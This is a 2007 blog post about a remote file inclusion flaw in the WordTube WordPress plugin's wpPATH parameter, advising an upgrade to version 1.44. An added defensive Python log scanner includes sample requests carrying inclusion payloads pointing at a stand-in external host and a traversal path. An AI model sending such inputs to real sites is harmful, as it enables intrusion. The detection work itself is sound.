May 14, 2007
WordTube Exploit
If you're using the WordTube extension for WordPress, haven't been hacked yet, and haven't heard about the remote code execution vulnerability, then you're very lucky and should read on.
The Problem
The following critical problem affects every version of WordTube prior to 1.44. From Secunia:
M.Hasran Addahroni has reported a vulnerability in the wordTube plugin for WordPress, which can be exploited by malicious people to disclose sensitive information or to compromise a vulnerable system.
Input passed to the "wpPATH" parameter in wordtube-button.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources.
Solution
Upgrade to version 1.44 immediately!
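To check whether a site was probed before the upgrade, the following added example (not part of the original post and not WordTube's own code) scans web server access log lines for requests to wordtube-button.php whose wpPATH value points at an external resource or walks out of the directory. The log format, the sample lines and the PLUGIN_DIR placeholder are assumptions made for the illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Client address and request target from a common/combined-format access log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) [^"]*"')

def classify_wppath(value):
    """Return why a wpPATH value looks like an inclusion attempt, or None."""
    v = unquote(value).lower()  # parse_qs decoded once; this catches double encoding
    if re.match(r'^[a-z][a-z0-9+.\-]+:', v) or v.startswith('//'):
        return 'external resource'
    if '..' in v:
        return 'directory traversal'
    if '\x00' in v:
        return 'null byte'
    return None

def scan(lines):
    """Return (client, reason, value) for each suspicious wordtube-button.php request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith('/wordtube-button.php'):
            continue
        # PHP request parameter names are case-sensitive, so match wpPATH exactly.
        for value in parse_qs(url.query, keep_blank_values=True).get('wpPATH', []):
            reason = classify_wppath(value)
            if reason:
                hits.append((client, reason, value))
    return hits

# Constructed sample lines; PLUGIN_DIR is a placeholder, not the plugin's real path.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/May/2007:10:00:00 +0000] "GET /PLUGIN_DIR/wordtube-button.php?wpPATH=http://example.invalid/x HTTP/1.1" 200 512',
    '198.51.100.23 - - [14/May/2007:10:02:11 +0000] "GET /PLUGIN_DIR/wordtube-button.php?wpPATH=..%2F..%2Fsome%2Ffile HTTP/1.1" 200 87',
    '192.0.2.10 - - [14/May/2007:10:03:40 +0000] "GET /PLUGIN_DIR/wordtube-button.php?wpPATH=/var/www/blog/ HTTP/1.1" 200 1024',
    '192.0.2.11 - - [14/May/2007:10:04:02 +0000] "GET /index.php?wpPATH=http://example.invalid/x HTTP/1.1" 200 4096',
]

if __name__ == '__main__':
    for client, reason, value in scan(SAMPLE_LOG):
        print(f'{client}\t{reason}\t{value!r}')
```

Access logs record only the query string, so a wpPATH value sent in a POST body will not show up in this scan.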
Jeffrey Barke is senior developer and information architect at theMechanism, a maxi-media firm in New York City and London.
Published by: jeffreybarke in The Programming Mechanism